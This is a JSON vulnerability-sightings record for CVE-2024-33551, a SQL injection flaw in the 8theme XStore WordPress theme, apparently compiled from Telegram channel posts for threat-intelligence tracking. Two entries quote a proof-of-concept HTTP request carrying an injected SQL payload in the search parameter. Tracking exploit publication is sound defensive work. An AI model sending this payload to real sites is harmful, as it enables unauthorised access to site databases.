{"vulnerability": "CVE-2024-33551", "sightings": [{"uuid": "f6b2c5c1-885f-439a-b6a2-0eb8d621111d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33551", "type": "seen", "source": "Telegram/seW4YQz-REJyzTikkfHgsRZ4Ux5RhVM8gdZsQawfB68ACAph", "content": "", "creation_timestamp": "2025-02-21T22:10:26.000000Z"}, {"uuid": "a2e63225-9ac6-4102-b1a8-148141eb8407", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33551", "type": "published-proof-of-concept", "source": "https://t.me/Hunt3rkill3rs1/228", "content": "CVE-2024-33551\n\u26d4\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c SQL inj, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u0430\u044f \u0432 8theme XStore, \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043a\u043e\u043c\u043c\u0435\u0440\u0446\u0438\u0438, \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u0439 \u043d\u0430 \u0431\u0430\u0437\u0435 WordPress. \n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u044b SQL \u0432 \u0431\u0430\u0437\u0435 \u0434\u0430\u043d\u043d\u044b\u0445.\n\n\nPOC\nPOST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1\nHost: example.com\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: keep-alive\nUpgrade-Insecure-Requests: 1", "creation_timestamp": "2024-05-17T14:08:04.000000Z"}, {"uuid": "eec32afa-5d51-4006-a997-22e684fa36b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33551", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2083", "content": "CVE-2024-33551\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c SQL inj, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u0430\u044f \u0432 8theme XStore, \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043a\u043e\u043c\u043c\u0435\u0440\u0446\u0438\u0438, \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u0439 \u043d\u0430 \u0431\u0430\u0437\u0435 WordPress. \n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u044b SQL \u0432 \u0431\u0430\u0437\u0435 \u0434\u0430\u043d\u043d\u044b\u0445.\n*\nPOC\nPOST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1\nHost: example.com\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: keep-alive\nUpgrade-Insecure-Requests: 1\n\n#wordpress #sql", "creation_timestamp": "2024-05-17T09:37:07.000000Z"}, {"uuid": "9c849dbf-57e0-40f8-ba93-437bb6c478f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33551", "type": "published-proof-of-concept", "source": "Telegram/Yjt6cu7IAmBNEpWkiwVSLBSyN66WJ3YX3P7NEa8-fBbAVow", "content": "", "creation_timestamp": "2024-06-25T06:56:30.000000Z"}]}